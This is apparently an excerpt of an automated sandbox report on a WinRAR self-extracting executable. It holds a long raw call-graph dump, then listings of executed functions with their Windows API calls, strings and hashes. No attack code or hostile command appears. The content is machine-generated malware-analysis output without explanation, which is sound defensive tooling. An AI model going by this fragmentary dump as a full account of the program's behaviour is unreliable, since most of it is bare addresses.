25458->25457 25460 12e309 25459->25460 25461 12e31c 25460->25461 25469 126891 25460->25469 25461->25416 25464 135c5e __EH_prolog 25463->25464 25465 13feae 27 API calls 25464->25465 25466 135c7a 25465->25466 25467 1288f2 25466->25467 25483 13215f 81 API calls 25466->25483 25467->25423 25470 12689b __EH_prolog 25469->25470 25475 140013 25470->25475 25472 1268b7 25473 140013 41 API calls 25472->25473 25474 1268d9 __cftof 25473->25474 25474->25461 25477 14001f ___scrt_is_nonwritable_in_current_image 25475->25477 25476 14004a 25476->25472 25477->25476 25479 126920 25477->25479 25480 12692a __EH_prolog 25479->25480 25481 1304e5 41 API calls 25480->25481 25482 126936 25481->25482 25482->25477 25483->25467 25485 1290ac __EH_prolog 25484->25485 25513 1213f8 25485->25513 25487 1290c8 25488 1290d9 25487->25488 25677 12b1d2 25487->25677 25492 129110 25488->25492 25525 121ad3 25488->25525 25669 121641 25492->25669 25494 12910c 25494->25492 25544 122032 25494->25544 25496 1291b2 25548 12924e 25496->25548 25499 129211 25499->25492 25556 124264 25499->25556 25568 1292c6 25499->25568 25504 12b966 7 API calls 25505 129139 25504->25505 25505->25496 25505->25504 25681 12d4d2 CompareStringW _wcslen 25505->25681 25507 12b97b 25506->25507 25511 12b9a9 25507->25511 25905 12ba94 25507->25905 25509 12b98b 25510 12b990 FindClose 25509->25510 25509->25511 25510->25511 25511->25426 25512->25429 25514 1213fd __EH_prolog 25513->25514 25515 126891 41 API calls 25514->25515 25516 121428 25515->25516 25517 12e298 41 API calls 25516->25517 25518 121437 25517->25518 25519 13feae 27 API calls 25518->25519 25524 1214ab 25518->25524 25520 121498 25519->25520 25522 12644d 43 API calls 25520->25522 25520->25524 25522->25524 25523 121533 __cftof 25523->25487 25682 12c1f7 25524->25682 25526 121add __EH_prolog 25525->25526 25538 121b30 25526->25538 25540 121c63 25526->25540 25700 1213d9 25526->25700 25529 121c9e 25703 121397 75 API calls 25529->25703 25531 124264 116 API calls 25534 121ce9 25531->25534 25532 121cab 25532->25531 25532->25540 25533 121d31 25537 121d64 25533->25537 25533->25540 25704 121397 75 API calls 25533->25704 25534->25533 25536 124264 116 API calls 25534->25536 25536->25534 25537->25540 25543 12b110 80 API calls 25537->25543 25538->25529 25538->25532 25538->25540 25539 124264 116 API calls 25541 121db5 25539->25541 25540->25494 25541->25539 25541->25540 25542 12b110 80 API calls 25542->25538 25543->25541 25545 122037 __EH_prolog 25544->25545 25547 122068 25545->25547 25718 121a7e 25545->25718 25547->25505 25723 12e395 25548->25723 25550 12925e 25727 1326f1 GetSystemTime SystemTimeToFileTime 25550->25727 25552 1291cc 25552->25499 25553 132ea4 25552->25553 25728 13ef9b 25553->25728 25557 124270 25556->25557 25558 124274 25556->25558 25557->25499 25567 12b110 80 API calls 25558->25567 25559 124286 25560 1242af 25559->25560 25563 1242a1 25559->25563 25737 122eb6 116 API calls 3 library calls 25560->25737 25562 1242e1 25562->25499 25563->25562 25736 12395a 104 API calls 3 library calls 25563->25736 25565 1242ad 25565->25562 25738 122544 75 API calls 25565->25738 25567->25559 25569 1292d0 __EH_prolog 25568->25569 25572 12930e 25569->25572 25598 12973d Concurrency::cancel_current_task 25569->25598 25779 139c9d 118 API calls 25569->25779 25571 12a18d 25573 12a192 25571->25573 25574 12a1c5 25571->25574 25572->25571 25576 12932f 25572->25576 25572->25598 25573->25598 25810 128675 167 API calls 25573->25810 25574->25598 25811 139c9d 118 API calls 25574->25811 25576->25598 25739 1266df 25576->25739 25579 129545 25586 129669 25579->25586 25579->25598 25782 128f6b 39 API calls 25579->25782 25581 129405 25581->25579 25780 12b5d6 57 API calls 3 library calls 25581->25780 25585 1295ac 25781 148a08 26 API calls ___std_exception_copy 25585->25781 25588 12b966 7 API calls 25586->25588 25590 1296db 25586->25590 25588->25590 25589 129935 25789 12e4a9 97 API calls 25589->25789 25745 1289c8 25590->25745 25593 12976c 25603 1297c5 25593->25603 25783 124727 41 API calls 2 library calls 25593->25783 25596 129990 25597 129a3a 25596->25597 25605 1299bb 25596->25605 25602 129a8c 25597->25602 25612 129a45 25597->25612 25598->25499 25600 1298f4 Concurrency::cancel_current_task 25600->25596 25790 12851f 50 API calls 2 library calls 25600->25790 25604 129a2c 25602->25604 25793 128db3 120 API calls 25602->25793 25603->25598 25603->25600 25617 1298ed 25603->25617 25784 1287fb 41 API calls 25603->25784 25785 12e4a9 97 API calls 25603->25785 25786 12237a 75 API calls 25603->25786 25787 128f28 99 API calls 25603->25787 25606 129ae8 25604->25606 25625 129a8a 25604->25625 25605->25604 25605->25606 25609 12b4c1 3 API calls 25605->25609 25610 129b53 25606->25610 25657 12a14a 25606->25657 25794 12ab1c 25606->25794 25607 12a801 81 API calls 25607->25598 25608 12a801 81 API calls 25608->25598 25614 1299f3 25609->25614 25751 12bf0a 25610->25751 25612->25625 25792 128b7c 124 API calls 25612->25792 25614->25604 25791 12a50a 98 API calls 25614->25791 25616 129ba2 25620 12bf0a 27 API calls 25616->25620 25788 12237a 75 API calls 25617->25788 25638 129bb8 25620->25638 25625->25607 25626 129b41 25798 127951 78 API calls 25626->25798 25628 129c8b 25629 129ce7 25628->25629 25630 129e85 25628->25630 25633 129cff 25629->25633 25637 129da7 25629->25637 25631 129e97 25630->25631 25632 129eab 25630->25632 25654 129d20 25630->25654 25805 12a475 138 API calls __EH_prolog 25631->25805 25755 134576 25632->25755 25635 129d46 25633->25635 25644 129d0e 25633->25644 25635->25654 25801 12829b 112 API calls 25635->25801 25802 128f6b 39 API calls 25637->25802 25638->25628 25639 129c62 25638->25639 25648 12aa7a 80 API calls 25638->25648 25639->25628 25799 12ac9c 83 API calls 25639->25799 25640 129ec4 25765 13421f 25640->25765 25800 12237a 75 API calls 25644->25800 25646 129e76 25646->25499 25648->25639 25649 129dec 25650 129e08 25649->25650 25651 129e1f 25649->25651 25649->25654 25803 128037 86 API calls 25650->25803 25804 12a212 104 API calls __EH_prolog 25651->25804 25654->25646 25658 129fca 25654->25658 25806 12237a 75 API calls 25654->25806 25656 12a0d5 25656->25657 25659 12b8e6 3 API calls 25656->25659 25657->25608 25658->25656 25658->25657 25660 12a083 25658->25660 25807 12b199 SetEndOfFile 25658->25807 25661 12a130 25659->25661 25774 12b032 25660->25774 25661->25657 25808 12237a 75 API calls 25661->25808 25664 12a0ca 25666 12a880 78 API calls 25664->25666 25666->25656 25667 12a140 25809 127871 77 API calls 25667->25809 25670 121653 25669->25670 25672 121665 Concurrency::cancel_current_task 25669->25672 25670->25672 25892 1216b2 25670->25892 25673 122111 26 API calls 25672->25673 25674 121694 25673->25674 25895 12e339 25674->25895 25678 12b1e9 25677->25678 25679 12b1f3 25678->25679 25904 1277af 79 API calls 25678->25904 25679->25488 25681->25505 25683 12c20d __cftof 25682->25683 25688 12c0d3 25683->25688 25695 12c0b4 25688->25695 25690 12c148 25691 122111 25690->25691 25692 12212b 25691->25692 25693 12211c 25691->25693 25692->25523 25699 12136b 26 API calls Concurrency::cancel_current_task 25693->25699 25696 12c0c2 25695->25696 25697 12c0bd 25695->25697 25696->25690 25698 122111 26 API calls 25697->25698 25698->25696 25699->25692 25705 121822 25700->25705 25703->25540 25704->25537 25706 1213f2 25705->25706 25707 121834 25705->25707 25706->25542 25708 12185d 25707->25708 25715 1276e9 77 API calls __vswprintf_c_l 25707->25715 25710 14520e 22 API calls 25708->25710 25712 12187a 25710->25712 25711 121853 25716 12775a 76 API calls 25711->25716 25712->25706 25717 12775a 76 API calls 25712->25717 25715->25711 25716->25708 25717->25706 25719 121a8a 25718->25719 25720 121a8e 25718->25720 25719->25547 25722 1219c5 143 API calls 25720->25722 25722->25719 25724 12e3a5 25723->25724 25726 12e3ac 25723->25726 25725 12aa7a 80 API calls 25724->25725 25725->25726 25726->25550 25727->25552 25729 13efa8 25728->25729 25730 12f937 53 API calls 25729->25730 25731 13efcb 25730->25731 25732 124a20 _swprintf 51 API calls 25731->25732 25733 13efdd 25732->25733 25734 13e607 17 API calls 25733->25734 25735 132eba 25734->25735 25735->25499 25736->25565 25737->25565 25738->25562 25740 1266ef 25739->25740 25812 1265fb 25740->25812 25742 12675a 25742->25581 25743 126722 25743->25742 25817 12c6af CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25743->25817 25746 1289dd 25745->25746 25747 128a15 25746->25747 25823 127931 75 API calls 25746->25823 25747->25589 25747->25593 25747->25598 25749 128a0d 25824 121397 75 API calls 25749->25824 25752 12bf18 25751->25752 25754 12bf22 25751->25754 25753 13feae 27 API calls 25752->25753 25753->25754 25754->25616 25756 13458b 25755->25756 25758 134595 ___std_exception_copy 25755->25758 25825 12775a 76 API calls 25756->25825 25759 13461b 25758->25759 25760 1346c5 25758->25760 25761 13463f __cftof 25758->25761 25826 1344a9 76 API calls 3 library calls 25759->25826 25827 143330 RaiseException 25760->25827 25761->25640 25764 1346f1 25766 134251 25765->25766 25767 134228 25765->25767 25768 134245 25766->25768 25842 1366c4 138 API calls 2 library calls 25766->25842 25767->25768 25769 134247 25767->25769 25771 13423d 25767->25771 25768->25654 25841 13739e 133 API calls 25769->25841 25828 137dcc 25771->25828 25775 12b043 25774->25775 25777 12b052 25774->25777 25776 12b049 FlushFileBuffers 25775->25776 25775->25777 25776->25777 25778 12b0cf SetFileTime 25777->25778 25778->25664 25779->25572 25780->25585 25781->25579 25782->25586 25783->25603 25784->25603 25785->25603 25786->25603 25787->25603 25788->25600 25789->25600 25790->25596 25791->25604 25792->25625 25793->25604 25795 129b2b 25794->25795 25796 12ab25 GetFileType 25794->25796 25795->25610 25797 12237a 75 API calls 25795->25797 25796->25795 25797->25626 25798->25610 25799->25628 25800->25654 25801->25654 25802->25649 25803->25654 25804->25654 25805->25654 25806->25658 25807->25660 25808->25667 25809->25657 25810->25598 25811->25598 25818 1264f8 25812->25818 25815 12661c 25815->25743 25816 1264f8 2 API calls 25816->25815 25817->25743 25821 126502 25818->25821 25819 1265ea 25819->25815 25819->25816 25821->25819 25822 12c6af CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25821->25822 25822->25821 25823->25749 25824->25747 25825->25758 25826->25761 25827->25764 25843 13479d 25828->25843 25830 137ddd __InternalCxxFrameHandler 25832 1381ee 25830->25832 25849 12e56c 25830->25849 25858 135001 133 API calls 25830->25858 25859 138243 133 API calls 25830->25859 25860 13229f 89 API calls 25830->25860 25861 1324df 25830->25861 25865 134b0c 99 API calls __InternalCxxFrameHandler 25830->25865 25866 13889f 138 API calls __InternalCxxFrameHandler 25830->25866 25867 1363a9 99 API calls __InternalCxxFrameHandler 25832->25867 25834 1381fe __InternalCxxFrameHandler 25834->25768 25841->25768 25842->25768 25845 1347a7 __cftof __EH_prolog 25843->25845 25844 134892 25844->25830 25845->25844 25846 134829 __cftof ___std_exception_copy 25845->25846 25847 140013 41 API calls 25845->25847 25846->25844 25868 12775a 76 API calls 25846->25868 25847->25846 25855 12e582 __InternalCxxFrameHandler 25849->25855 25850 12e6f2 25851 12e726 25850->25851 25869 12e523 25850->25869 25873 132121 25851->25873 25855->25850 25856 12e6e9 25855->25856 25879 12bff5 92 API calls __EH_prolog 25855->25879 25880 139c9d 118 API calls 25855->25880 25856->25830 25858->25830 25859->25830 25860->25830 25862 132516 25861->25862 25863 1324eb ResetEvent ReleaseSemaphore 25861->25863 25862->25830 25891 1322fc 80 API calls 25863->25891 25865->25830 25866->25830 25867->25834 25868->25846 25870 12e52b 25869->25870 25871 12e568 25869->25871 25870->25871 25881 132e58 25870->25881 25871->25851 25874 132128 25873->25874 25875 132143 25874->25875 25889 1276e4 RaiseException std::_Xinvalid_argument 25874->25889 25877 132154 SetThreadExecutionState 25875->25877 25890 1276e4 RaiseException std::_Xinvalid_argument 25875->25890 25877->25856 25879->25855 25880->25855 25884 13eead 25881->25884 25885 1315a3 25884->25885 25886 13eec4 SendDlgItemMessageW 25885->25886 25887 13c748 PeekMessageW KiUserCallbackDispatcher IsDialogMessageW TranslateMessage DispatchMessageW 25886->25887 25888 132e78 25887->25888 25888->25871 25889->25875 25890->25877 25891->25862 25901 1220ed 26 API calls Concurrency::cancel_current_task 25892->25901 25894 1216c0 25896 12e34a Concurrency::cancel_current_task 25895->25896 25902 12bd8e 87 API calls Concurrency::cancel_current_task 25896->25902 25898 12e37c 25903 12bd8e 87 API calls Concurrency::cancel_current_task 25898->25903 25900 12e387 25901->25894 25902->25898 25903->25900 25904->25679 25906 12baa1 25905->25906 25907 12bb20 FindNextFileW 25906->25907 25908 12baba FindFirstFileW 25906->25908 25909 12bb2b GetLastError 25907->25909 25915 12bb02 25907->25915 25910 12bac9 25908->25910 25908->25915 25909->25915 25911 12cf32 GetCurrentDirectoryW 25910->25911 25912 12bad9 25911->25912 25913 12baf7 GetLastError 25912->25913 25914 12badd FindFirstFileW 25912->25914 25913->25915 25914->25913 25914->25915 25915->25509 25916->25433 25918 133540 25917->25918 25920 133560 Concurrency::cancel_current_task 25918->25920 25921 132206 25918->25921 25922 1324df 82 API calls 25921->25922 25923 132228 ReleaseSemaphore 25922->25923 25924 132266 DeleteCriticalSection CloseHandle CloseHandle 25923->25924 25925 132248 25923->25925 25924->25920 25928 1322fc 80 API calls 25925->25928 25927 132252 CloseHandle 25927->25924 25927->25925 25928->25927 25929->25283 25930->25286 25931->25286 25932->25289 25933->25295 25935 12b1d2 79 API calls 25934->25935 25936 12208f 25935->25936 25937 121ad3 116 API calls 25936->25937 25940 1220ac 25936->25940 25938 12209c 25937->25938 25938->25940 25941 121397 75 API calls 25938->25941 25940->25303 25940->25304 25941->25940 25943 13ffc0 25942->25943 25944 12b4e0 GetFileAttributesW 25943->25944 25945 12b4f1 25944->25945 25946 12b4ca 25944->25946 25947 12cf32 GetCurrentDirectoryW 25945->25947 25946->25084 25946->25097 25948 12b505 25947->25948 25948->25946 25949 12b509 GetFileAttributesW 25948->25949 25949->25946 25950->25324 25951->25323 25952->25326 25953->25337 26210 144bc0 5 API calls CatchGuardHandler 25964 13eff2 25965 13efff 25964->25965 25966 12f937 53 API calls 25965->25966 25967 13f00c 25966->25967 25968 124a20 _swprintf 51 API calls 25967->25968 25969 13f021 SetDlgItemTextW 25968->25969 25970 13c748 5 API calls 25969->25970 25971 13f03e 25970->25971 26171 1405f0 27 API calls 26144 1530f0 CloseHandle 26187 132efb GetCPInfo IsDBCSLeadByte 25982 1213fd 43 API calls 2 library calls 26189 13c2e3 79 API calls 26173 13ede1 DialogBoxParamW 25986 14cce0 25987 14cce9 25986->25987 25988 14ccf2 25986->25988 25990 14cbd7 25987->25990 25991 14a505 _abort 38 API calls 25990->25991 25992 14cbe4 25991->25992 26010 14ccfe 25992->26010 25994 14cbec 26019 14c96b 25994->26019 25997 14cc03 25997->25988 25998 14a7ee __vsnwprintf_l 21 API calls 25999 14cc14 25998->25999 26006 14cc46 25999->26006 26026 14cda0 25999->26026 26002 14a65a _free 20 API calls 26002->25997 26003 14cc41 26036 14a7db 20 API calls _free 26003->26036 26005 14cc8a 26005->26006 26037 14c841 26 API calls 26005->26037 26006->26002 26007 14cc5e 26007->26005 26008 14a65a _free 20 API calls 26007->26008 26008->26005 26011 14cd0a ___scrt_is_nonwritable_in_current_image 26010->26011 26012 14a505 _abort 38 API calls 26011->26012 26014 14cd14 26012->26014 26015 14cd98 _abort 26014->26015 26018 14a65a _free 20 API calls 26014->26018 26038 14a0e4 38 API calls _abort 26014->26038 26039 14bde1 EnterCriticalSection 26014->26039 26040 14cd8f LeaveCriticalSection _abort 26014->26040 26015->25994 26018->26014 26020 145934 __cftof 38 API calls 26019->26020 26021 14c97d 26020->26021 26022 14c98c GetOEMCP 26021->26022 26023 14c99e 26021->26023 26024 14c9b5 26022->26024 26023->26024 26025 14c9a3 GetACP 26023->26025 26024->25997 26024->25998 26025->26024 26027 14c96b 40 API calls 26026->26027 26028 14cdbf 26027->26028 26031 14ce10 IsValidCodePage 26028->26031 26033 14cdc6 26028->26033 26035 14ce35 __cftof 26028->26035 26029 140d6c CatchGuardHandler 5 API calls 26030 14cc39 26029->26030 26030->26003 26030->26007 26032 14ce22 GetCPInfo 26031->26032 26031->26033 26032->26033 26032->26035 26033->26029 26041 14ca43 GetCPInfo 26035->26041 26036->26006 26037->26006 26039->26014 26040->26014 26042 14cb27 26041->26042 26048 14ca7d 26041->26048 26045 140d6c CatchGuardHandler 5 API calls 26042->26045 26047 14cbd3 26045->26047 26047->26033 26051 14db38 26048->26051 26050 14bd28 __vsnwprintf_l 43 API calls 26050->26042 26052 145934 __cftof 38 API calls 26051->26052 26053 14db58 MultiByteToWideChar 26052->26053 26055 14db96 26053->26055 26062 14dc2e 26053->26062 26057 14dbb7 __cftof __vsnwprintf_l 26055->26057 26058 14a7ee __vsnwprintf_l 21 API calls 26055->26058 26056 140d6c CatchGuardHandler 5 API calls 26059 14cade 26056->26059 26060 14dc28 26057->26060 26063 14dbfc MultiByteToWideChar 26057->26063 26058->26057 26065 14bd28 26059->26065 26070 14bd73 20 API calls _free 26060->26070 26062->26056 26063->26060 26064 14dc18 GetStringTypeW 26063->26064 26064->26060 26066 145934 __cftof 38 API calls 26065->26066 26067 14bd3b 26066->26067 26071 14bb0b 26067->26071 26070->26062 26072 14bb26 __vsnwprintf_l 26071->26072 26073 14bb4c MultiByteToWideChar 26072->26073 26074 14bb76 26073->26074 26075 14bd00 26073->26075 26080 14a7ee __vsnwprintf_l 21 API calls 26074->26080 26082 14bb97 __vsnwprintf_l 26074->26082 26076 140d6c CatchGuardHandler 5 API calls 26075->26076 26077 14bd13 26076->26077 26077->26050 26078 14bbe0 MultiByteToWideChar 26079 14bc4c 26078->26079 26081 14bbf9 26078->26081 26107 14bd73 20 API calls _free 26079->26107 26080->26082 26098 14c11c 26081->26098 26082->26078 26082->26079 26086 14bc23 26086->26079 26089 14c11c __vsnwprintf_l 11 API calls 26086->26089 26087 14bc5b 26088 14a7ee __vsnwprintf_l 21 API calls 26087->26088 26092 14bc7c __vsnwprintf_l 26087->26092 26088->26092 26089->26079 26090 14bcf1 26106 14bd73 20 API calls _free 26090->26106 26092->26090 26093 14c11c __vsnwprintf_l 11 API calls 26092->26093 26094 14bcd0 26093->26094 26094->26090 26095 14bcdf WideCharToMultiByte 26094->26095 26095->26090 26096 14bd1f 26095->26096 26108 14bd73 20 API calls _free 26096->26108 26099 14be48 _free 5 API calls 26098->26099 26100 14c143 26099->26100 26103 14c14c 26100->26103 26109 14c1a4 10 API calls 3 library calls 26100->26109 26102 14c18c LCMapStringW 26102->26103 26104 140d6c CatchGuardHandler 5 API calls 26103->26104 26105 14bc10 26104->26105 26105->26079 26105->26086 26105->26087 26106->26079 26107->26075 26108->26079 26109->26102 26145 1410e0 LocalFree 26174 14d1e0 GetProcessHeap

        Executed Functions

        Function 0013F04C Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 202filesleeptimeCOMMON
        Download Yara Rule

        Control-flow Graph

        APIs
          • Part of subcall function 00131B7C: GetModuleHandleW.KERNEL32(kernel32), ref: 00131B95
          • Part of subcall function 00131B7C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00131BA7
          • Part of subcall function 00131B7C: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00131BD8
          • Part of subcall function 0013B64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0013B655
          • Part of subcall function 0013BD0B: OleInitialize.OLE32(00000000), ref: 0013BD24
          • Part of subcall function 0013BD0B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0013BD5B
          • Part of subcall function 0013BD0B: SHGetMalloc.SHELL32(0016A460), ref: 0013BD65
        • GetCommandLineW.KERNEL32 ref: 0013F08B
        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0013F0B5
        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 0013F0C6
        • UnmapViewOfFile.KERNEL32(00000000), ref: 0013F117
          • Part of subcall function 0013ED1E: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0013ED34
          • Part of subcall function 0013ED1E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0013ED70
          • Part of subcall function 0013074B: _wcslen.LIBCMT ref: 0013076F
        • CloseHandle.KERNEL32(00000000), ref: 0013F11E
        • GetModuleFileNameW.KERNEL32(00000000,00180CC0,00000800), ref: 0013F138
        • SetEnvironmentVariableW.KERNEL32(sfxname,00180CC0), ref: 0013F144
        • GetLocalTime.KERNEL32(?), ref: 0013F14F
        • _swprintf.LIBCMT ref: 0013F18E
        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0013F1A3
        • GetModuleHandleW.KERNEL32(00000000), ref: 0013F1AA
        • LoadIconW.USER32(00000000,00000064), ref: 0013F1C1
        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9C0,00000000), ref: 0013F212
        • Sleep.KERNEL32(?), ref: 0013F240
        • DeleteObject.GDI32 ref: 0013F279
        • DeleteObject.GDI32(?), ref: 0013F289
        • CloseHandle.KERNEL32 ref: 0013F2CC
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
        • API String ID: 3014515783-3710569615
        • Opcode ID: 08d0db6798f3989bb0a5cb15aa1996cc0a62b8859f389018a778339ac423e880
        • Instruction ID: 8aa04ac6e645ac6533b48f03c45a3fa9355e4d050056bb1e2076a7b5df3b7be9
        • Opcode Fuzzy Hash: 08d0db6798f3989bb0a5cb15aa1996cc0a62b8859f389018a778339ac423e880
        • Instruction Fuzzy Hash: 1B61F571900300FBD311ABA5EC89F6B3BECEB59745F440029F945A25A2DB74DDC9CB62
        Function 0013B6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 701 13b6c2-13b6df FindResourceW 702 13b6e5-13b6f6 SizeofResource 701->702 703 13b7db 701->703 702->703 705 13b6fc-13b70b LoadResource 702->705 704 13b7dd-13b7e1 703->704 705->703 706 13b711-13b71c LockResource 705->706 706->703 707 13b722-13b737 GlobalAlloc 706->707 708 13b7d3-13b7d9 707->708 709 13b73d-13b746 GlobalLock 707->709 708->704 710 13b7cc-13b7cd GlobalFree 709->710 711 13b74c-13b76a call 142db0 CreateStreamOnHGlobal 709->711 710->708 714 13b7c5-13b7c6 GlobalUnlock 711->714 715 13b76c-13b78e call 13b626 711->715 714->710 715->714 720 13b790-13b798 715->720 721 13b7b3-13b7c1 720->721 722 13b79a-13b7ae GdipCreateHBITMAPFromBitmap 720->722 721->714 722->721 723 13b7b0 722->723 723->721
        APIs
        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0013C91D,00000066), ref: 0013B6D5
        • SizeofResource.KERNEL32(00000000,?,?,?,0013C91D,00000066), ref: 0013B6EC
        • LoadResource.KERNEL32(00000000,?,?,?,0013C91D,00000066), ref: 0013B703
        • LockResource.KERNEL32(00000000,?,?,?,0013C91D,00000066), ref: 0013B712
        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0013C91D,00000066), ref: 0013B72D
        • GlobalLock.KERNEL32(00000000), ref: 0013B73E
        • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0013B762
        • GlobalUnlock.KERNEL32(00000000), ref: 0013B7C6
          • Part of subcall function 0013B626: GdipAlloc.GDIPLUS(00000010), ref: 0013B62C
        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0013B7A7
        • GlobalFree.KERNEL32(00000000), ref: 0013B7CD
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
        • String ID: PNG
        • API String ID: 211097158-364855578
        • Opcode ID: 2c6aeb0163c295a3cb81f03010abec87e21fbeb83ac9d437a2d854a9a9c3e981
        • Instruction ID: d2d14a67873e4c748de89aa95abb2935521e8c50062d549c668e9bc6809aa9e3
        • Opcode Fuzzy Hash: 2c6aeb0163c295a3cb81f03010abec87e21fbeb83ac9d437a2d854a9a9c3e981
        • Instruction Fuzzy Hash: 88318171608712EBD7109F61ECC8D1B7FA8EF85796F050518FA05C6A60EB31D8C4CBA0
        Function 0012BA94 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 831 12ba94-12bab8 call 13ffc0 834 12bb20-12bb29 FindNextFileW 831->834 835 12baba-12bac7 FindFirstFileW 831->835 836 12bb3b-12bbf8 call 131928 call 12d71d call 132914 * 3 834->836 837 12bb2b-12bb39 GetLastError 834->837 835->836 838 12bac9-12badb call 12cf32 835->838 842 12bbfd-12bc0a 836->842 839 12bb12-12bb1b 837->839 846 12baf7-12bb00 GetLastError 838->846 847 12badd-12baf5 FindFirstFileW 838->847 839->842 848 12bb02-12bb05 846->848 849 12bb10 846->849 847->836 847->846 848->849 851 12bb07-12bb0a 848->851 849->839 851->849 853 12bb0c-12bb0e 851->853 853->839
        APIs
        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,0012B98B,000000FF,?,?), ref: 0012BABD
          • Part of subcall function 0012CF32: _wcslen.LIBCMT ref: 0012CF56
        • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0012B98B,000000FF,?,?), ref: 0012BAEB
        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0012B98B,000000FF,?,?), ref: 0012BAF7
        • FindNextFileW.KERNEL32(?,?,?,?,?,?,0012B98B,000000FF,?,?), ref: 0012BB21
        • GetLastError.KERNEL32(?,?,?,?,0012B98B,000000FF,?,?), ref: 0012BB2D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: FileFind$ErrorFirstLast$Next_wcslen
        • String ID:
        • API String ID: 42610566-0
        • Opcode ID: da56306a4290eaa0203fa62c2fe108046d8d89d4bbf4cb07a3c5ee5c2f875652
        • Instruction ID: b3764e0373ab054055b012a212a6f9d0dfbd5f2217b47f9fca37a0aee2169bf1
        • Opcode Fuzzy Hash: da56306a4290eaa0203fa62c2fe108046d8d89d4bbf4cb07a3c5ee5c2f875652
        • Instruction Fuzzy Hash: B8415F72901529ABCB25DF64DCC4AE9B3B8FB48350F10019AF96DE3240D734AE94CF90
        Function 001292C6 Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1157COMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 001292CB
